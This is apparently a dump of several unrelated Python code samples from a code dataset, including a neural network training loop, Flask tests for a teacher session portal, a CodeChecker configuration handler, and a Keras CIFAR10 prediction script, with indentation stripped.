a5=(Z1*B31)+(Z2*B32)+B000
Z3=sigmoidF(a3)
Z4=sigmoidF(a4)
Z5=sigmoidF(a5)
y1.append(Z3)
y2.append(Z4)
y3.append(Z5)
DW11=(-2*(X1-sigmoidF(a3))*sigmoidP(a3)*B11*sigmoidP(a1)*X1)+(-2*(X2-sigmoidF(a4))*sigmoidP(a4)*B21*sigmoidP(a1)*X1)+(-2*(X3-sigmoidF(a5))*sigmoidP(a5)*B31*sigmoidP(a1)*X1)
DW12=(-2*(X1-sigmoidF(a3))*sigmoidP(a3)*B11*sigmoidP(a1)*X2)+(-2*(X2-sigmoidF(a4))*sigmoidP(a4)*B21*sigmoidP(a1)*X2)+(-2*(X3-sigmoidF(a5))*sigmoidP(a5)*B31*sigmoidP(a1)*X2)
DW13=(-2*(X1-sigmoidF(a3))*sigmoidP(a3)*B11*sigmoidP(a1)*X3)+(-2*(X2-sigmoidF(a4))*sigmoidP(a4)*B21*sigmoidP(a1)*X3)+(-2*(X3-sigmoidF(a5))*sigmoidP(a5)*B31*sigmoidP(a1)*X3)
DW21=(-2*(X1-sigmoidF(a3))*sigmoidP(a3)*B12*sigmoidP(a2)*X1)+(-2*(X2-sigmoidF(a4))*sigmoidP(a4)*B22*sigmoidP(a2)*X1)+ (-2*(X3-sigmoidF(a5))*sigmoidP(a5)*B32*sigmoidP(a2)*X1)
DW22=(-2*(X1-sigmoidF(a3))*sigmoidP(a3)*B12*sigmoidP(a2)*X2)+(-2*(X2-sigmoidF(a4))*sigmoidP(a4)*B22*sigmoidP(a2)*X2)+(-2*(X3-sigmoidF(a5))*sigmoidP(a5)*B32*sigmoidP(a2)*X2)
DW23=(-2*(X1-sigmoidF(a3))*sigmoidP(a3)*B12*sigmoidP(a2)*X3)+ (-2*(X2-sigmoidF(a4))*sigmoidP(a4)*B22*sigmoidP(a2)*X3)+(-2*(X3-sigmoidF(a5))*sigmoidP(a5)*B32*sigmoidP(a2)*X3)
DW0=(-2*(X1-sigmoidF(a3))*sigmoidP(a3)*B11*sigmoidP(a1))+(-2*(X2-sigmoidF(a4))*sigmoidP(a4)*B21*sigmoidP(a1))+(-2*(X3-sigmoidF(a5))*sigmoidP(a5)*B31*sigmoidP(a1))
DW00=(-2*(X1-sigmoidF(a3))*sigmoidP(a3)*B11*sigmoidP(a2))+(-2*(X2-sigmoidF(a4))*sigmoidP(a4)*B21*sigmoidP(a2))+ (-2*(X3-sigmoidF(a5))*sigmoidP(a5)*B31*sigmoidP(a2))
DB11=-2*(X1-sigmoidF(a3))*sigmoidP(a3)*Z1
DB12=-2*(X1-sigmoidF(a3))*sigmoidP(a3)*Z2
DB21=-2*(X2-sigmoidF(a4))*sigmoidP(a4)*Z1
DB22=-2*(X2-sigmoidF(a4))*sigmoidP(a4)*Z2
DB31=-2*(X3-sigmoidF(a5))*sigmoidP(a5)*Z1
DB32=-2*(X3-sigmoidF(a5))*sigmoidP(a5)*Z2
DB0=-2*(X1-sigmoidF(a3))*sigmoidP(a3)
DB00=-2*(X2-sigmoidF(a4))*sigmoidP(a4)
DB000=-2*(X3-sigmoidF(a5))*sigmoidP(a5)
W11=W11-(lr*DW11)
W12=W12-(lr*DW12)
W13=W13-(lr*DW13)
W21=W21-(lr*DW21)
W22=W22-(lr*DW22)
W23=W23-(lr*DW23)
W0=W0-(lr*DW0)
W00=W00-(lr*DW00)
B11=B11-(lr*DB11)
B12=B12-(lr*DB12)
B21=B21-(lr*DB21)
B22=B22-(lr*DB22)
B31=B31-(lr*DB31)
B32=B32-(lr*DB32)
B0=B0-(lr*DB0)
B00=B00-(lr*DB00)
B000=B000-(lr*DB000)
diff1=np.square(training_dataset[:,0]-y1)
diff2=np.square(training_dataset[:,1]-y2)
diff3=np.square(training_dataset[:,2]-y3)
diff=(diff1+diff2+diff3)
difftrain=diff.reshape(800,1)
msetrain=np.mean(difftrain)
y11=[]
y22=[]
y33=[]
for i in range(test_dataset.shape[0]):
X1_test=test_dataset[i][0]
X2_test=test_dataset[i][1]
X3_test=test_dataset[i][2]
a1=(X1_test*W11)+(X2_test*W12)+(X3_test*W13)+W0
Z1=sigmoidF(a1)
a2=(X1_test*W21)+(X2_test*W22)+(X3_test*W23)+W00
Z2=sigmoidF(a2)
a3=(Z1*B11)+(Z2*B12)+B0
a4=(Z1*B21)+(Z2*B22)+B00
a5=(Z1*B31)+(Z2*B32)+B000
Z3=sigmoidF(a3)
Z4=sigmoidF(a4)
Z5=sigmoidF(a5)
y11.append(Z3)
y22.append(Z4)
y33.append(Z5)
diff1=np.square(test_dataset[:,0]-y11)
diff2=np.square(test_dataset[:,1]-y22)
diff3=np.square(test_dataset[:,2]-y33)
diff=(diff1+diff2+diff3)
difftest=diff.reshape(200,1)
msetest=np.mean(difftest)
print("Train Loss after Epoch" , epoch,"is : ",msetrain,"Test Loss after Epoch" , epoch,"is : ",msetest)
train_loss_array.append(msetrain)
test_loss_array.append(msetest)
#lr=1/(epoch+1)
y11=[]
y22=[]
y33=[]
for i in range(test_dataset.shape[0]):
X1=test_dataset[i][0]
X2=test_dataset[i][1]
X3=test_dataset[i][2]
a1=(X1*W11)+(X2*W12)+(X3*W13)+W0
Z1=sigmoidF(a1)
a2=(X1*W21)+(X2*W22)+(X3*W23)+W00
Z2=sigmoidF(a2)
a3=(Z1*B11)+(Z2*B12)+B0
a4=(Z1*B21)+(Z2*B22)+B00
a5=(Z1*B31)+(Z2*B32)+B000
Z3=sigmoidF(a3)
Z4=sigmoidF(a4)
Z5=sigmoidF(a5)
y11.append(Z3)
y22.append(Z4)
y33.append(Z5)
diff1=(test_dataset[:,0]-y11)
diff2=(test_dataset[:,1]-y22)
diff3=(test_dataset[:,2]-y33)
diff=np.square(diff1+diff2+diff3)
diff=diff.reshape(200,1)
mse=np.mean(diff)
print("Loss on test set ",mse)
plt.title("Train and Test Loss each Epoch for guassian data without Autograd")
plt.xlabel("Epochs")
plt.ylabel("Train and Test Loss for without Autograd")
for i in range(198):
plt.plot([i,i+2],train_loss_array[i:i+2],linestyle='-',linewidth=1,color='red')
plt.plot([i,i+2],test_loss_array[i:i+2],linestyle='-',linewidth=1,color='blue')
plt.legend(["train_loss_array", "test_loss_array"], loc ="upper right")
plt.savefig("Q1_WA.png")
plt.clf()
| StarcoderdataPython |
3374893 | import pytest
from flask import g, session, url_for, request
from portal.db import get_db
def test_sessions(client, auth):
auth.teacher_login()
# Teachers should see session from mock data on session page
response = client.get('/teacher/sessions')
assert b'180 A' in response.data
# Teachers should be able to delete sessions using a POST request
client.post(
'/teacher/sessions',
data={'id': 1}
)
response = client.get('/teacher/sessions')
# Session 1 should now be deleted and no longer shown
assert b'180 A' not in response.data
# Teachers should not able able to delete sessions they don't own
response = client.post(
'/teacher/sessions',
data={'id': 3}
)
assert b'Something went wrong.' in response.data
def test_make_session(client, auth):
auth.teacher_login()
# On a GET request where session creation is not underway, users should be
# redirected to the courses page
response = client.get('teacher/sessions/create')
assert 'http://localhost/teacher/courses' == response.headers['Location']
# Teachers should be able to begin creating a session via POST request
response = client.post(
'/teacher/sessions/create',
data={'course_id': 1}
)
# Teacher should see a student's name if session creation begins successfully
assert b'<NAME>' in response.data
# Cancel the session creation before next request
client.get('teacher/sessions/cancel')
# Teachers should not be able to create sessions for courses they don't own
client.post(
'/teacher/sessions/create',
data={'course_id': 4}
)
response = client.get('/teacher/courses')
assert b'Something went wrong.' in response.data
def test_session_add(client, auth):
auth.teacher_login()
# Get requests should be redirected away
response = client.get('/teacher/sessions/add')
assert 'http://localhost/teacher/sessions/create' == response.headers['Location']
# Session creation must be underway to add students to the roster for that session
# otherwise the user will simply be redirected away
response = client.post(
'/teacher/sessions/add',
data={'id':2}
)
assert 'http://localhost/teacher/sessions/create' == response.headers['Location']
# Now we begin creating a session
client.post(
'/teacher/sessions/create',
data={'course_id':1}
)
# Teachers should not be able to add teachers to the roster
client.post(
'/teacher/sessions/add',
data={'id': 3}
)
response = client.get('teacher/sessions/create')
assert b'Something went wrong.' in response.data
# Students may then be added with checkbox interface
response = client.post(
'/teacher/sessions/add',
data={'id':2}
)
# Confirm that session_add redirects to session page after running
assert 'http://localhost/teacher/sessions/create' == response.headers['Location']
response = client.get('/teacher/sessions/create')
# Confirm that the roster is not empty
assert b'Remove from Session' in response.data
def test_session_remove(client, auth):
auth.teacher_login()
# Get requests should be redirected away
response = client.get('/teacher/sessions/remove')
assert 'http://localhost/teacher/sessions/create' == response.headers['Location']
# Session creation must be underway to remove students from the roster
# otherwise the user will simply be redirected away
response = client.post(
'/teacher/sessions/remove',
data={'id':2}
)
assert 'http://localhost/teacher/sessions/create' == response.headers['Location']
# Now we begin creating a session
client.post(
'/teacher/sessions/create',
data={'course_id':1}
)
# Teachers shouldn't be able to attempt to remove invalid users from the table
client.post(
'teacher/sessions/remove',
data={'id':3}
)
response = client.get('/teacher/sessions/create')
assert b'Something went wrong.' in response.data
# Students need to be added before they can be removed
client.post(
'/teacher/sessions/add',
data={'id':2}
)
# The added student can be removed
client.post(
'teacher/sessions/remove',
data={'id':2}
)
response = client.get('/teacher/sessions/create')
# In the test case, the roster for this session should now be empty
assert b'Remove from Session' not in response.data
def test_session_submit(client, auth):
auth.teacher_login()
# If a user tries to use the GET method at the submit URL, they should be
# redirected to the session creation interface
response = client.get('/teacher/sessions/submit')
assert 'http://localhost/teacher/sessions/create' == response.headers['Location']
# Session creation must be underway to submit other information to finalize it,
# otherwise the user will simply be redirected away
response = client.post(
'/teacher/sessions/submit',
data={
'session_name': 'A',
'meeting_days': 'MTWThF',
'meeting_place': 'Mellor',
'meeting_time': '12-4:30'
}
)
assert 'http://localhost/teacher/sessions/create' == response.headers['Location']
client.post(
'/teacher/sessions/create',
data={'course_id':1}
)
# If the user successfully submits the post request, they should be redirected
# to the appropriate page
response = client.post(
'/teacher/sessions/submit',
data={
'session_name': 'A',
'meeting_days': 'MTWThF',
'meeting_place': 'Mellor',
'meeting_time': '12-4:30'
}
)
assert 'http://localhost/teacher/sessions' == response.headers['Location']
# If the user attempts to submit invalid data (excessive text length)
# it should not be sent to the database
# Re-start session creation
client.post(
'/teacher/sessions/create',
data={'course_id':1}
)
# Post some invalid data
client.post(
'/teacher/sessions/submit',
data={
'session_name': 'A',
'meeting_days': 'MTWThF',
'meeting_place': 'This text is way too long for this field',
'meeting_time': '12-4:30'
}
)
# Get a page that will display the warning that should be flashed
response = client.get('teacher/courses')
assert b'Something went wrong.' in response.data
def test_session_cancel(client, auth):
auth.teacher_login()
# If the user tries to cancel a session when one does not exist, they will be
# redirected away
response = client.get('/teacher/sessions/cancel')
assert 'http://localhost/teacher/home' == response.headers['Location']
# The user begins creation of a session
client.post(
'/teacher/sessions/create',
data={'course_id':1}
)
# The user cancels creation of a session
response = client.get('/teacher/sessions/cancel')
assert 'http://localhost/teacher/home' == response.headers['Location']
# If the user now tries to view the session creation window, they will be
# redirected to the courses page
response = client.get('/teacher/sessions/create')
assert 'http://localhost/teacher/courses' == response.headers['Location']
def test_session_edit(client, auth, app):
auth.teacher_login()
# If the user tries to visit the edit page without an edit in progress,
# They should be redirected to the teacher home view
response = client.get('/teacher/sessions/edit')
assert 'http://localhost/teacher/home' == response.headers['Location']
# The user should be able to begin a new editing session by posting a session code
response = client.post(
'/teacher/sessions/edit',
data={'edit':1}
)
# They should then see the editing page
assert b'Edit a Session' in response.data
# Cancel edit to prepare for next request
client.get('/teacher/sessions/cancel')
# Teachers should not be able to edit sessions they do not own
client.post(
'/teacher/sessions/edit',
data={'edit': 3}
)
response = client.get('teacher/home')
assert b'Something went wrong.' in response.data
def test_edit_mode(client, auth):
auth.teacher_login()
# A user begins editing a post
client.post(
'/teacher/sessions/edit',
data={'edit':1}
)
# Adding and removing from the roster, canceling, and submitting
# should behave differently when an edit is in progress
response = client.get('/teacher/sessions/add')
assert 'http://localhost/teacher/sessions/edit' == response.headers['Location']
response = client.get('/teacher/sessions/remove')
assert 'http://localhost/teacher/sessions/edit' == response.headers['Location']
response = client.get('/teacher/sessions/submit')
assert 'http://localhost/teacher/sessions/edit' == response.headers['Location']
client.get('/teacher/sessions/cancel')
response = client.get('/teacher/home')
assert b'Session edit canceled' in response.data
| StarcoderdataPython |
3434394 | #!/usr/bin/env python
import sys
import numpy as np
from scipy.spatial import distance
from scipy.stats import pearsonr, spearmanr
from itertools import izip
np.random.seed(1337) # for reproducibility
def pos_prob(x, y):
# return sum(np.log(x[y > 0])) / sum(y)
pos_probs = np.log(x[y > 0])
pos_probs = np.nan_to_num(pos_probs)
return sum(pos_probs)
def min_prob(x, y):
""" the minimum probability of those fields, that should have
been > .5 """
return min(x[y > 0])
def max_prob(x, y):
""" maximum of those that should be zero """
return max(x[y < 1])
def all_prob(x, y):
# return sum(np.log(x[y > 0])) / sum(y)
pos_probs = np.log(x[y > 0])
pos_probs[np.isnan(pos_probs)] = 0
# pos_probs = np.nan_to_num(pos_probs)
neg_probs = np.log(1 - x[y < 1])
neg_probs[np.isnan(neg_probs)] = 0
# neg_probs = np.nan_to_num(neg_probs)
return sum(pos_probs) + sum(neg_probs)
def count_correct(x, y):
return sum((x > .5) == y) / sum(y)
# def print_score(probs, dist_func, name):
# dist = [dist_func(a, b) for a, b in izip(probs, self.Y_eval)]
# print(dist[0], self.scores[0], dist[1100],
# self.scores[1100], dist[-1], self.scores[-1])
# pearson, p = pearsonr(self.scores, dist)
# spearman, p = spearmanr(self.scores, dist)
# print ("[%s]\tP: %f\tS: %f\tSum: %f" %
# (name, pearson, spearman, sum(dist)))
# self.history[name].append((pearson, spearman, sum(dist)))
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('pred', help='predictions npz',
type=argparse.FileType('r'))
args = parser.parse_args()
npzfile = np.load(args.pred)
# X=self.X_eval, Y=self.Y_eval, predicted=probs)
X = npzfile['X']
Y = npzfile['Y']
pred = npzfile['predicted']
assert pred.shape == Y.shape
dist_func = distance.cosine
dist = [dist_func(a, b) for a, b in izip(pred, Y)]
for d in dist:
print d
| StarcoderdataPython |
5086998 | # -------------------------------------------------------------------------
#
# Part of the CodeChecker project, under the Apache License v2.0 with
# LLVM Exceptions. See LICENSE for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
#
# -------------------------------------------------------------------------
"""
Handle Thrift requests for configuration.
"""
import codechecker_api_shared
from codechecker_common.logger import get_logger
from codechecker_server.profiler import timeit
from codechecker_web.shared import convert
from ..database.config_db_model import Configuration
from ..database.database import DBSession
LOG = get_logger('server')
class ThriftConfigHandler:
"""
Manages Thrift requests regarding configuration.
"""
def __init__(self, auth_session, config_session):
self.__auth_session = auth_session
self.__session = config_session
def __require_supermission(self):
"""
Checks if the current user isn't a SUPERUSER.
"""
if (not (self.__auth_session is None) and
not self.__auth_session.is_root):
raise codechecker_api_shared.ttypes.RequestFailed(
codechecker_api_shared.ttypes.ErrorCode.UNAUTHORIZED,
"You are not authorized to modify the notification.")
return True
@timeit
def getNotificationBannerText(self):
"""
Retrieves the notification banner text.
"""
notificationString = ''
with DBSession(self.__session) as session:
notificationQuery = session.query(Configuration) \
.filter(
Configuration.config_key == 'notification_banner_text') \
.one_or_none()
if notificationQuery is not None:
notificationString = notificationQuery.config_value
return convert.to_b64(notificationString)
@timeit
def setNotificationBannerText(self, notification_b64):
"""
Sets the notification banner remove_products_except.
Bevare: This method only works if the use is a SUPERUSER.
"""
self.__require_supermission()
notification = convert.from_b64(notification_b64)
with DBSession(self.__session) as session:
notificationQuery = session.query(Configuration) \
.filter(
Configuration.config_key == 'notification_banner_text') \
.one_or_none()
if notificationQuery is None:
conf = Configuration('notification_banner_text', notification)
session.add(conf)
session.flush()
else:
# update it
notificationQuery.config_value = notification
session.commit()
session.close()
| StarcoderdataPython |
171411 | class BadStatusException(Exception):
pass | StarcoderdataPython |
5185690 | <reponame>nchlis/CIFAR10_CAM<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Thu May 9 15:53:01 2019
@author: N.Chlis
"""
from keras.models import load_model
import numpy as np
from keras.datasets import cifar10
(X_tr, y_tr), (X_val, y_val) = cifar10.load_data()
#normalize input images to [0,1]
X_tr=X_tr/2**8
X_val=X_val/2**8
model = load_model('CNN_CAM_128_256.hdf5')
#get predicted labels for the validation set
y_val_hat = model.predict(X_val)
np.save('CNN_CAM_128_256_y_val_hat.npy',y_val_hat)
| StarcoderdataPython |
8164296 | <filename>garpar/utils/mabc.py
import attr
from abc import ABCMeta, abstractmethod # noqa
HPARAM_METADATA_FLAG = "__hparam__"
MPROPERTY_METADATA_FLAG = "__mproperty__"
MODEL_CONFIG = "__model_cls_config__"
def hparam(default, **kwargs):
"""Create a hyper parameter for market maker.
By design decision, hyper-parameter is required to have a sensitive default
value.
Parameters
----------
default :
Sensitive default value of the hyper-parameter.
**kwargs :
Additional keyword arguments are passed and are documented in
``attr.ib()``.
Return
------
Hyper parameter with a default value.
Notes
-----
This function is a thin-wrapper over the attrs function ``attr.ib()``.
"""
metadata = kwargs.pop("metadata", {})
metadata[HPARAM_METADATA_FLAG] = True
return attr.ib(default, metadata=metadata, kw_only=True, **kwargs)
def mproperty(**kwargs):
"""Create a hyper parameter for market maker.
By design decision, hyper-parameter is required to have a sensitive default
value.
Parameters
----------
default :
Sensitive default value of the hyper-parameter.
**kwargs :
Additional keyword arguments are passed and are documented in
``attr.ib()``.
Return
------
Hyper parameter with a default value.
Notes
-----
This function is a thin-wrapper over the attrs function ``attr.ib()``.
"""
metadata = kwargs.pop("metadata", {})
metadata[MPROPERTY_METADATA_FLAG] = True
return attr.ib(init=False, metadata=metadata, **kwargs)
@attr.s(repr=False)
class ModelABC(metaclass=ABCMeta):
__model_cls_config__ = {"repr": False, "frozen": True}
def __init_subclass__(cls):
"""Initiate of subclasses.
It ensures that every inherited class is decorated by ``attr.s()`` and
assigns as class configuration the parameters defined in the class
variable `__portfolio_maker_cls_config__`.
In other words it is slightly equivalent to:
.. code-block:: python
@attr.s(**PortfolioMakerABC.__portfolio_maker_cls_config__)
class Decomposer(PortfolioMakerABC):
pass
"""
model_config = getattr(cls, MODEL_CONFIG)
return attr.s(maybe_cls=cls, **model_config)
def __repr__(self):
"""x.__repr__() <==> repr(x)."""
clsname = type(self).__name__
selfd = attr.asdict(
self,
recurse=False,
filter=lambda attr, _: attr.repr,
)
hparams = sorted(selfd.items())
attrs_str = ", ".join([f"{k}={repr(v)}" for k, v in hparams])
return f"{clsname}({attrs_str})"
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.